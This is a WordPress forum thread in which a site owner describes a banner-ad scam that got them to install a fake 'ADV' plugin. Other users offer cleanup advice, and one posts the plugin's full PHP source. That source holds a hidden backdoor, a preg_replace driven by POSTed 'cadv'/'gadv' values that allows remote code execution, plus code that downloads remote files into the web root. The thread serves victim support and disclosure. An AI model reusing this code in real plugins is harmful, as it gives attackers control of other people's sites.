I installed a Fake Plugin sent by http://lemmaagency.com/

  • koolkashiii

    (@koolkashiii)


    12 years, 3 months ago

    I am running a website called http://www.birthcertificatepakistan.com for my consultancy business and this site is powered by WordPress. Few days back

    I received an email from a person “Lilian Marchand” requesting banner space for ad on my website. I quoted high prices for different banners sizes, actually I didn’t wanted to place banner on this domain.

    Interestingly after few emails he agreed to pay 3000 usd and sent a link to download and install a wordpress plugin called “ADV”. Unfortunately I installed and activated this plugin.

    When I realized that this might be a fake company company, so I searched for some reviews through google and find the truth that this company lemmaagency.com is fake company in real.

    I immediately removed their plugin from my site and everything is ok till now. But, I am still scared that what was the reason of this fake plugin and they might be tracking or we can say Hacking my private information.

    Can anyone has idea how to completely remove if there are any trackings installed on my site.

    Thanks

    Kashif Aman

Viewing 5 replies - 1 through 5 (of 5 total)
  • Snat

    (@snat)

    12 years, 3 months ago

    Can you link to the plugin, if it is to free to download as I may have a tiny bit of time to see what it did.

    Thread Starter koolkashiii

    (@koolkashiii)

    12 years, 3 months ago

    Thanks for your reply snat

    Actually I have removed this “adv” plugin from my site as well as from my pc. Now the fake website lemmaagency.com has also been suspended so I don’t have any link to their plugin for you.

    here is email last email that I received from “Lilian Marchand” which contains installation information:

    ————

    Hi!

    Thanks for reply to our proposal!
    We like your price.
    To pass to the banner control system follow the link http://webmaster.lemmaagency.com
    To enter use the following data:

    login: birthcertificatepakistan.com
    password: YXQ2O3

    You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web- address (for example: http://birthcertificatepakistan.com/?adv_test=1). It means, that visitors will see the banner only if it is approved and payment made.

    To get installation instruction for your site type pass to: http://docs.lemmaagency.com/wp_install
    To activate your site you have to enter the code: 8M2-ZIU-TB9

    What way of payment is suitable for you?

    Best regards,
    Lilian Marchand.
    site: http://www.lemmaagency.com
    e-mail: lmarchand@lemmaagency.com
    phone: + (0)9 78 62 24 83
    ———-

    Thanks for your help.

    Thanks

    Kashif Aman

    Moderator cubecolour

    (@numeeja)

    12 years, 3 months ago

    it certainly sounds fishy. without a way to see the plugin, we can only speculate on what this plugin may have done to your site.

    It could have sent your admin username and password somewhere – so changing all passwords on the site may be a good idea.

    It may have made changes to code in your WordPress core files, plugin files or theme files. Or added/ changed something in the database.

    Changes might be masked on the front end to only be seen by people with a particular browser, or by search bots

    replacing the files and database with the last known clean backups would be prudent in cases where a hacked site is suspected.

    WithSLee

    (@withslee)

    12 years, 2 months ago

    I was hit by the same banner ad scam in December.

    I emailed LaCoste (the company the scammers where pretending to be selling ads for), and the LaCoste representative verified that these people are illegitimate.

    Here is the code from the plugin they are pushing:

    <?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'ritaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}

?>
    Thread Starter koolkashiii

    (@koolkashiii)

    12 years, 2 months ago

    I am not good in php and unable to understand above code but this plugin damaged alexa ranking of my site in big way. I have restored old backup of my site and changed all security passwords from wp-admin to cpanel and database (all possible). Now all looks good..

    Thanks

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘I installed a Fake Plugin sent by http://lemmaagency.com/’ is closed to new replies.